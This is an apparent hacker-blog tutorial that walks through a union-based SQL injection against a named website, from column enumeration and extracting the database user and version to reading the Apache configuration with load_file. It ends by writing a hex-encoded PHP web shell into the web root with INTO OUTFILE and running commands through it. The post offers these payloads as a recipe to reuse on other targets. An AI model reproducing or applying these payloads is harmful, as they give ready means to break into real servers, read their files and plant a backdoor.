I decided to write a Complete Tutorial on Pwning a machine using SQL injection even without Executing system Commands.
Here is the Complete Video and you can watch the video before reading for a better understanding
well First we will start from recognizing the Injection Point.
So here we go.
http://turfrecon.com/select.php
POST Union Based SQL injection
lets try to enter 1' and see what happens.....
so now we can start injection:
1' order by 1#
No Error
1' order by 2#
Error
Getting Required INformation from the server
1' union all select group_concat(database(),0x3D,user(),0x3D,version(),0x3D,@@datadir)#
By this Query we got
Database : sqlol
username : root@
version : 5.5.24-log
datadir : c:\wamp\bin\mysql\mysql5.5.24\data\
Now lets find out the Apache version
well for that there are many ways but m going to use firefox Temperdata addon to check the request header.
so its Apache2.2.22
Now we can guess the Apache Config File Path so lets view the file using a SQL query
1' union all select load_file('c:/wamp/bin/apache/apache2.2.22/conf/httpd.conf')#
Now search for the website Name and get the document root
DocumentRoot "c:/wamp/www/turf/"
1' union all select 0x3c3f2073797374656d28245f4745545b2763275d293b203f3e INTO OUTFILE 'c:/wamp/www/turf/gothacked.php'#
Now check http://turfrecon.com/gothacked.php?c=echo "You Got pwn3d"
now u can upload any file on the server using wget command
NOTE: I WENT THROUGHT THE FILES AS PER THE SCENARIO, WHICH MAY BE DIFFRENT IN DIFFRENT CASES SO
YOU JUST NEED TO FIND THE DEFAULT FILES PATH AS PER YOUR SCENARIO REST THE COMMANDS WILL
BE SAME.
Have Fun Thanxz for Reading
3nj0y H4ck!nG
0 comments:
Post a Comment